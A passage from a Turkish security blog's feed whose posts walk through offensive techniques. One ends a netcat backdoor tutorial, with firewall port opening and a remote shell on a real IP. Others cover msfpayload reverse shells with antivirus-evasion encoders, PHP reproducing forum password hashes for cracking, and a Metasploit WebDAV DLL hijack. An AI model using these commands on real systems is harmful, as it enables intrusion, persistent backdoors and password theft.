yapılandırması:&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;Çalışma modu                  = Devre Dışı Bırak&lt;br /&gt;Özel durum modu                    = Etkinleştir&lt;br /&gt;&lt;br /&gt;Standard profil yapılandırması (geçerli):&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;Çalışma modu                  = Devre Dışı Bırak&lt;br /&gt;Özel durum modu                    = Etkinleştir&lt;br /&gt;&lt;br /&gt;Yerel Ağ Bağlantısı güvenlik duvarı yapılandırması:&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;Çalışma modu                  = Etkinleştir&lt;br /&gt;&lt;br /&gt;sanal güvenlik duvarı yapılandırması:&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;Çalışma modu                  = Etkinleştir&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Artık hedef makina için 455 nolu port tamamen güvensiz bir moda geçti diyebiliriz.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;C:\Documents and Settings\Administrator&amp;gt;netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL&lt;br /&gt;Tamam.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C:\Documents and Settings\Administrator&amp;gt;netsh firewall show portopening&lt;br /&gt;&lt;br /&gt;Standard profili için bağlantı noktası yapılandırması:&lt;br /&gt;Bağlantı Noktası   İletişim Kuralı  Mod     Ad&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;5353   TCP       Etkinle  Adobe CSI CS4&lt;br /&gt;455    TCP       Etkinle  Service Firewall&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C:\Documents and Settings\Administrator&amp;gt;netsh firewall show portopening&lt;br /&gt;&lt;br /&gt;Standard profili için bağlantı noktası yapılandırması:&lt;br /&gt;Bağlantı Noktası   İletişim Kuralı  Mod     Ad&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;5353   TCP       Etkinle  Adobe CSI CS4&lt;br /&gt;455    TCP       Etkinle  Service Firewall&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C:\Documents and Settings\Administrator&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;İşlem burada tamamlandı . Kök sunucuyu test edebilmek için sistemi yeniden başlatacağız .Çünkü sistem her yeniden başlatıldığında saldırgana girebilmesi için gerekli yolu açacak.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:# nc -v 88.216.1.9 455&lt;br /&gt;88.216.1.9: inverse host lookup failed: Unknown server error : Connection timed out&lt;br /&gt;(UNKNOWN) [88.216.1.9] 455 (?) open&lt;br /&gt;Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;&lt;br /&gt;C:\Documents and Settings\Administrator&amp;gt;Oyun Bitti&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bu Döküman FreWaL'tarafından güvenlik amacı ile yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-4822926830146256229?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/4822926830146256229/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/06/netcat-backdoor.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4822926830146256229'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4822926830146256229'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/06/netcat-backdoor.html' title='Netcat ile Kalıcı Backdoor (  )'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-hWHZkJubbi0/TedVFsRhWtI/AAAAAAAAABg/dJwwkcULsIg/s72-c/1x.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-633938573863163953</id><published>2011-05-31T13:49:00.000-07:00</published><updated>2011-05-31T14:14:07.486-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='msfpayload generator'/><category scheme='http://www.blogger.com/atom/ns#' term='msfpayload'/><category scheme='http://www.blogger.com/atom/ns#' term='ters bağlantı'/><category scheme='http://www.blogger.com/atom/ns#' term='shell code'/><title type='text'>Fast-Track MsfPayload Generator</title><content type='html'>Çoğu zaman msfpayload kullanarak oluşturulan bağlantı şekillerinde hatalı komutlardan ötürü yanlışlıklar meydana gelebiliyor . Fast-Track bu ortamda iyi bir yardımcı olarak kendini gösteriyor . Fast-Track soru/seçenek methodu ile işlemlerinizi hızlı gerçekleştirmenizi sağlıyor.&lt;br /&gt;&lt;br /&gt;Başlatıldıktan sonra seçenek yöntemi ile işlemlerinizi gerçekleştirebilirsiniz. Biz bugünkü konumuzda msfpayload'dan bahsedeceğiz ;&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-q3BaLMcZdo8/TeVZBDhNPHI/AAAAAAAAABc/FIKTF29-C6M/s1600/Untitled-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-q3BaLMcZdo8/TeVZBDhNPHI/AAAAAAAAABc/FIKTF29-C6M/s200/Untitled-2.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;1.  Update Fast-Track&lt;br /&gt;2.  Autopwn Automated&lt;br /&gt;3.  MS-SQL Injector&lt;br /&gt;4.  MS-SQL Bruter&lt;br /&gt;5.  Binary to Hex Payload Generator&lt;br /&gt;6.  Mass Client-Side Attack&lt;br /&gt;7.  Exploits&lt;br /&gt;8.  SQLPwnage&lt;br /&gt;9.  Payload Generator&lt;br /&gt;10. Changelog&lt;br /&gt;11. Credits&lt;br /&gt;12. About&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;9 nolu seçenekteki Payload Generatorden ters bağlantı için yararlanabilirsiniz. Payload generatoru seçtikten sonra Fast-Track sorulara devam edecektir ve ilk sorusu Bağlantı şekli olacaktır ;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;What payload do you want to generate:&lt;br /&gt;&lt;br /&gt;Name:                                Description:&lt;br /&gt;&lt;br /&gt;1. Windows Shell Reverse_TCP         Spawn a command shell on victim and send back to attacker.&lt;br /&gt;2. Windows Reverse_TCP Meterpreter   Spawn a meterpreter shell on victim and send back to attacker.&lt;br /&gt;3. Windows Reverse_TCP VNC DLL       Spawn a VNC server on victim and send back to attacker.&lt;br /&gt;4. Windows Bind Shell                Execute payload and create an accepting port on remote system.&lt;br /&gt;&lt;br /&gt;    &lt;ctrl&gt;-c to Cancel&lt;br /&gt;&lt;br /&gt;    Enter choice (example 1-6):&lt;br /&gt;&lt;/ctrl&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Fast-Track 3. Kısımda bağlantı için şifreleme methodu isteyecektir. Buda antileri aşmak için önemli bir seçenektir o yüzden es geçmemekte fayda var yok ben istemiyorum derseniz 14 nolu seçenekten yararlabilirsiniz.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;1. avoid_utf8_tolower&lt;br /&gt;2. shikata_ga_nai&lt;br /&gt;3. alpha_mixed&lt;br /&gt;4. alpha_upper&lt;br /&gt;5. call4_dword_xor&lt;br /&gt;6. countdown&lt;br /&gt;7. fnstenv_mov&lt;br /&gt;8. jmp_call_additive&lt;br /&gt;9. nonalpha&lt;br /&gt;10. nonupper&lt;br /&gt;11. unicode_mixed&lt;br /&gt;12. unicode_upper&lt;br /&gt;13. alpha2&lt;br /&gt;14. No Encoding&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Method seçildikten sora yazılım ters bağlantı için sizden ip adresinizi ve port numaranızı isteyecektir.Hemen ardından yine 2 seçenek ile karşılaşacaksınız ;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;1. Executable&lt;br /&gt;2. Shellcode&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;1 nolu seçeneği işlerseniz yazılım multi/handler'i kullanarak dinleme işlemine geçecektir. Yok bana shell codemi verin derseniz 2 nolu seçeneği kullanacaksınız.&lt;br /&gt;&lt;br /&gt;Bu döküman acemi düzeydeki arkadaşlar için FreWaL Tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-633938573863163953?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/633938573863163953/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/fast-track-msf-payload-generator.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/633938573863163953'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/633938573863163953'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/fast-track-msf-payload-generator.html' title='Fast-Track MsfPayload Generator'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-q3BaLMcZdo8/TeVZBDhNPHI/AAAAAAAAABc/FIKTF29-C6M/s72-c/Untitled-2.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-4369129485280506601</id><published>2011-05-31T11:40:00.000-07:00</published><updated>2011-05-31T14:14:30.746-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cehturkiye'/><category scheme='http://www.blogger.com/atom/ns#' term='ceh'/><title type='text'>iPad Hediyeli CTF Ethical Hacking Yarışması</title><content type='html'>Konuyu cehturkiyeden okuyabilirsiniz. Geçtiğimiz günlerde başlattıkları yarışmaya çakma bir lakapla katılma fırsatı buldum :) gerçek manada çekişmeli bir yarışma diyebilirim . Ancak işlerim dolayısı ile sürekli takip etme fırsatı bulamıyorum. O yüzden iyi bir noktada elendiğimi zevkle duyuruyorum :) .&amp;nbsp; Herşeye rağmen güzeldi diyorum. detayları aşağıdaki siteden okuyabilirsiniz.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cehturkiye.com/index.php/2011/05/28/ipad-hediyeli-ctf-ethical-hacking-yarismasi/ipad-hediyeli-ctf-ethical-hacking-yarismasi.html"&gt;http://www.cehturkiye.com/index.php/2011/05/28/ipad-hediyeli-ctf-ethical-hacking-yarismasi/ipad-hediyeli-ctf-ethical-hacking-yarismasi.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;İstSec İstanbul Bilgi Güvenliği Konferansı kapsamında gerçekleştirdiğimiz CTF oyunu başlamıştır.&lt;br /&gt;&lt;br /&gt;CTF Nedir?&lt;br /&gt;&lt;br /&gt;Capture The Flag, beyaz şapkalı hackerlar arasında oynanan öğretici bir oyundur. Belirlenen hedefe ulaşmak ve bayrağı(hedef sistemlerde gizli metin dosyası) önce kapmak için sistemlerdeki güvenlik açıklıkları değerlendirilerek bayrağa ulaşılır.&lt;br /&gt;&lt;br /&gt;Yarışmanın Amacı&lt;br /&gt;&lt;br /&gt;CTF yarışmasının amacı, basit güvenlik hatalarının sonuçlarının nelere malolacağını uygulamalı olarak göstermektir. Yıkıcı bir hacking anlayışından ziyade katılımcının teorik bilgilerini uygulamaya koyması ve çeşitli sistemler arasındaki güvenlik sorunlarını hızlıca bulup değerlendirmesi beklenmektedir.&lt;br /&gt;&lt;br /&gt;Capture The Flag Ethical Hacking yarışması Bilgi Güvenliği AKADEMİSİ tarafından Labris Teknoloji ve Net İnternet sponsorluğunda gerçekleştirilmektedir.&lt;br /&gt;&lt;br /&gt;Hediyeler&lt;br /&gt;&lt;br /&gt;“Yarışmanın birincisine iPad (iPad 16GB Wi-Fi + 3G) hediye edilecektir.”&lt;br /&gt;Yarışmanın ikincisine 500 TL’lik hediye çeki verilecektir.&lt;br /&gt;Yarışmanın üçüncüsüne 250 TL’lik hediye çeki verilecektir.&lt;br /&gt;&lt;br /&gt;Katılım Şartları&lt;br /&gt;&lt;br /&gt;Yarışmaya katılmak isteyenler http://www.istsec.org/ctf-istsec.pcap dosyasını indirerek başlayabilirler. ctf-istsec.pcap dosyası içerisinden bir sonraki adıma ulaşmak için gerekli ipuçları yer almaktadır.&lt;br /&gt;&lt;br /&gt;pcap dosyası bir bankada güvenlik yöneticisi olarak çalışan uzmanın WPA destekli kablosuz ev ağından banka networküne bağlanırken alınmış paketleri içermektedir. Katılımcılardan bankada çalışan güvenlik uzmanının kullandığı WPA ağının parolasını çözüp bağlantı yaptığı paketler içerisindeki gizli ipucunu bulması beklenmektedir.&lt;br /&gt;&lt;br /&gt;Bu adımı tamamlayanlar için bir sonraki adım ipucu şeklinde gönderilecektir.&lt;br /&gt;&lt;br /&gt;Yarışmayla ilgili gelişmeler ve ipuçları http://friendfeed.com/ctfturkey adresinden yayınlanmaktadır.&lt;br /&gt;&lt;br /&gt;Yarışmanın sonuçları http://bit.ly/loQOt2 adresinden takip edilebilir.&lt;br /&gt;&lt;br /&gt;Sonuçlar ve Değerlendirme&lt;br /&gt;&lt;br /&gt;Yarışmanın kazananı puanlama sistemine göre yapılacaktır. Her adım, zamana bağlı ve çözüm yoluna bağlı bir puan derecesine sahiptir ve belirtilen zaman içerisinde en yüksek puanı alan yarışmayı kazanmış sayılır.&lt;br /&gt;&lt;br /&gt;CTF Hakkında detay bilgi için: ISTSEC ’11 CTF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-4369129485280506601?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/4369129485280506601/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/ipad-hediyeli-ctf-ethical-hacking.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4369129485280506601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4369129485280506601'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/ipad-hediyeli-ctf-ethical-hacking.html' title='iPad Hediyeli CTF Ethical Hacking Yarışması'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-2790665425751477909</id><published>2011-05-30T07:01:00.000-07:00</published><updated>2011-06-01T07:12:28.214-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='smf hash'/><category scheme='http://www.blogger.com/atom/ns#' term='whmcs hash'/><category scheme='http://www.blogger.com/atom/ns#' term='vBulletin hash'/><title type='text'>vBulletin , Smf  ve WHMCS Şifre Kombinasyonları</title><content type='html'>Bu konu ile askerdeki arkadaşım Dr.Ly0n'un kulaklarını çınlatmak istiyorum. Hepimiz efsanelerin gerçek dışı olduğunu biliriz . Örneğin elektirikten sorumlu devlet bakalı zeus yunan mitolojisinde bir evsanedir :) . Yada kaf dağının ardındaki altın kuş . . . Efsaneler çoğaltılabilir . Ancak ben internet ortamında yıllardan beridir dolaşan başka bir efsaneden bahsetmek istiyorum " vBulletin Hash'ı Kırılamaz " bosversene. . . Teoriler çürütmek içindir. Kardeşim Dr.Ly0n askere gitmeden önceki zamanlarda yine neden işsisiz diye düşünürken süre gelen efsane ile ilgili konu açıldı . Tembelliğimdenmi desem o zamana kadar merak etmeyişimdenmi desem yoksa vBulletin'i hiç kullanmadığım içinmi desem.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Hashının kombinasyonu hakkında bilgi sahibi değildim ( sadece kuvetli olduğunu ve bugüne kadar kırmak için hiç çaba sarf etmediğimi biliyorum ) .Doktor kardesimin bilgilendirmesi sorasında o hashın basit bir logaritma ile şifrelendiğini gördüm.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;vBulletin kullanıcı hashı vBulletin&amp;nbsp; üyelerinin bulunduğu tabloda salt bir değer ile ilişkilendirilerek oluşuyor. Basit bir döngü ile anlatmaya çalışırsak&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;&amp;lt;?php&lt;br /&gt;###########################&lt;br /&gt;#     VB KOMBİNASYONU     #&lt;br /&gt;#    Dr.Ly0n &amp;amp; FreWaL     #&lt;br /&gt;###########################&lt;br /&gt;// Değişken Salt ve Pass birleşiminden oluşuyor.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$salt = "nxo";&lt;br /&gt;$sifre = "654785";&lt;br /&gt;echo  md5(md5($sifre).$salt);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;/pre&gt;&lt;br /&gt;Burda dikkat edilmesi gereken kısım " md5(md5($sifre).$salt); " burasıdır.&lt;br /&gt;&lt;br /&gt;şifre değerini md5 e çevirdikten sora salt değer ile birleştirerek bir daha md5 e çeviriyor. Böylece Sözde kırılamaz hash ortaya çıkıyor ( külli yalan )&lt;br /&gt;Zira hash ve salt değerlere göre tarama yapabilen çok güzel md5 kırıcılar mevcut.&lt;br /&gt;&lt;br /&gt;Neyse üzerinde fazla durmak istemiyorum . Çoğu zaman local ortamda hazır scriptler üzerinde incelemeler yaparken ( secretlerine çomak sokmaya çalışırken )&lt;br /&gt;logaritmasını bilmediğimiz scriptlerin passlarını oluşturmakta güçlük çekeriz.Kullanım alanı kişiden kişiye değişir.Bende ona kolaylık olsun diye yazdığım ufak bir döngüyü yayınlamak istiyorum.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;###########################&lt;br /&gt;#  Salla Salla Vur Duvara #&lt;br /&gt;#    Dr.Ly0n &amp;amp; FreWaL     #&lt;br /&gt;###########################&lt;br /&gt;&lt;br /&gt;$x = $_GET["x"];&lt;br /&gt;$sifrex = base64_encode($_GET["sifre"]);&lt;br /&gt;$saltx = base64_encode($_GET["saltyadauye"]);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo '&lt;br /&gt;&lt;br /&gt;&amp;lt;form method="GET" action="?"&amp;gt;&lt;br /&gt;  &amp;lt;p&amp;gt;&lt;br /&gt;  Şifre&amp;lt;/p&amp;gt;&lt;br /&gt;  &amp;lt;p&amp;gt;&amp;lt;input type="text" name="sifre" size="52"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;  &amp;lt;p&amp;gt;Salt değer ( Smfde Kullanıcı ismi Yazılacaktır )&amp;lt;/p&amp;gt;&lt;br /&gt;  &amp;lt;p&amp;gt;&amp;lt;input type="text" name="saltyadauye" size="52"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;  &amp;lt;p&amp;gt;&amp;lt;input type="radio" value="1" checked name="x"&amp;gt;vBulettin&lt;br /&gt;  &amp;lt;input type="radio" value="2" name="x"&amp;gt;Smf&lt;br /&gt;  &amp;lt;input type="radio" value="3" name="x"&amp;gt;whmCs&amp;lt;/p&amp;gt;&lt;br /&gt;  &amp;lt;p&amp;gt;&amp;lt;input type="submit" value="Gonder" name="Geliyore"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;&lt;br /&gt;';&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if($x=="1"){&lt;br /&gt;&lt;br /&gt;$hashx =  md5(md5(base64_decode($sifrex)).base64_decode($saltx));&lt;br /&gt;echo '&amp;lt;br&amp;gt; vBulettin Hash : &amp;lt;br&amp;gt;'.$hashx;&lt;br /&gt;&lt;br /&gt;}else{&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/////////////////////&lt;br /&gt;&lt;br /&gt;if($x=="2"){&lt;br /&gt;&lt;br /&gt;echo '2';&lt;br /&gt;&lt;br /&gt;$hashx = sha1(strtolower(base64_decode($saltx)) . base64_decode($sifrex));&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo $hashx;&lt;br /&gt;&lt;br /&gt;}else{&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/////////////////////&lt;br /&gt;&lt;br /&gt;if($x=="3"){&lt;br /&gt;&lt;br /&gt;$hashx = md5(base64_decode($saltx) . base64_decode($sifrex)) . ":" . base64_decode($saltx);&lt;br /&gt;echo '&amp;lt;br&amp;gt; WHMCS Şifresi : &amp;lt;br&amp;gt;'.$hashx;&lt;br /&gt;&lt;br /&gt;}else{&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;/pre&gt;&lt;br /&gt;Bu döküman FreWaL tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-2790665425751477909?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/2790665425751477909/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/vbulletin-smf-ve-whmcs-pass.html#comment-form' title='3 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2790665425751477909'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2790665425751477909'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/vbulletin-smf-ve-whmcs-pass.html' title='vBulletin , Smf  ve WHMCS Şifre Kombinasyonları'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-4478613692104783140</id><published>2011-05-23T09:38:00.000-07:00</published><updated>2011-05-24T07:13:55.984-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dll hijacker'/><category scheme='http://www.blogger.com/atom/ns#' term='webdav'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='dll'/><title type='text'>Webdav Dll hijacker Güvenlik Açığı</title><content type='html'>Bu güvenlik açığına dair exploit geçtiğimiz aylarda microsoftun tüm çırpınışlarına rağmen exploit-db de yayınlandı.Öncelikle sizlere terimleri açıklayım.&lt;br /&gt;&lt;br /&gt;Webdav (Web Klasörü) , Dll ( &lt;span class="msg"&gt;&lt;span id="contextual"&gt;Dynamic Link Library&lt;/span&gt;&lt;/span&gt; ) , hijacker ingilizcede hırsız olarak geçer ancak burada (Browser Hırsızlığı) olarak anlam kazanıyor.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Güvenlik açığı basit bir dll infected işlemi ile gerçekleşiyor. Hedef makinedeki yazılımlara göre oluşturulan belgeler , kurbanın önüne açılan web klasöründe sergileniyor. Kurbanın dosyalardan herhangi birini açması ile dll kendini tetikliyor ve makineye infect oluyor , o andan sonra saldırgan makine bağlantıyı alıyor.&lt;br /&gt;&lt;br /&gt;işlem local yada remote yapılabiliyor.&lt;br /&gt;Güvenlik açığından etkilenen browserler : ie6, ie7, ie8, mozilla 3.5, opera 9&lt;br /&gt;&lt;br /&gt;Örnek saldırı :&lt;br /&gt;&lt;pre class="brush:php"&gt;msf : use windows/browser/webdav_dll_hijacker&lt;br /&gt;msf exploit(webdav_dll_hijacker) : set LHOST 192.168.1.3&lt;br /&gt;LHOST=192.168.1.3&lt;br /&gt;msf exploit(webdav_dll_hijacker) : set LPORT 8888 &lt;br /&gt;msf exploit(webdav_dll_hijacker) : set payloads windows/shell/reverse_tcp&lt;br /&gt;payloads =&amp;gt; windows/shell/reverse_tcp&lt;br /&gt;msf exploit(webdav_dll_hijacker) : set EXTENSIONS "doc txt docx html"&lt;br /&gt;EXTENSIONS =&amp;gt; doc txt docx html&lt;br /&gt;msf exploit(webdav_dll_hijacker) : exploit&lt;br /&gt;&lt;br /&gt;[*] Exploit running as background job.&lt;br /&gt;[*] Started reverse handler on 192.168.1.3:8888 msf exploit(webdav_dll_hijacker)&lt;br /&gt;[*] &lt;br /&gt;[*] Exploit links are now available at \\192.168.1.3\documents\&lt;br /&gt;[*] &lt;br /&gt;[*] Using URL: http://0.0.0.0:80/&lt;br /&gt;[*]&amp;nbsp; Local IP: http://192.168.1.3:80/&lt;br /&gt;[*] Server started.&lt;br /&gt;msf exploit(webdav_dll_hijacker) :&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Sonrasını görüntüler açıklıyor ;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-sPv2uuaUlL4/TdqM0DubfvI/AAAAAAAAABM/6RsIRXG841M/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="255" src="http://4.bp.blogspot.com/-sPv2uuaUlL4/TdqM0DubfvI/AAAAAAAAABM/6RsIRXG841M/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Uq3O33A3eJg/TdqM9KX7Y2I/AAAAAAAAABU/6Pr4dmWF7qk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="315" src="http://4.bp.blogspot.com/-Uq3O33A3eJg/TdqM9KX7Y2I/AAAAAAAAABU/6Pr4dmWF7qk/s400/2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;Bu döküman FreWaL tarafından güvenlik amacı ile yazılmıştır.&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-4478613692104783140?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/4478613692104783140/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/05/webdav-dll-hijacker-guvenlik-acg.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4478613692104783140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/4478613692104783140'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/05/webdav-dll-hijacker-guvenlik-acg.html' title='Webdav Dll hijacker Güvenlik Açığı'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-sPv2uuaUlL4/TdqM0DubfvI/AAAAAAAAABM/6RsIRXG841M/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-754698905262682628</id><published>2011-05-21T06:00:00.000-07:00</published><updated>2011-05-21T06:10:53.240-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TeamViewer'/><title type='text'>TeamViewer must not be executed as root! Hatası ve Çözümü</title><content type='html'>Tw ekibinin uzak yardım aracı olarak yazdığı programı bilirsiniz . Çoğu şirketin vazgeçilmezi haline geldiği dönemlerde yaşıyoruz . Bu gün teamvieweri bt5 e kurdum ancak aktif etmeye çalıştığım zaman çok ufak bir hata ile karşılaştım.Hiç bilmeyen arkadaşlara yararı olur diye bu dökümanı yazıyorum. Bilen zaten biliyordur.&lt;br /&gt;&lt;br 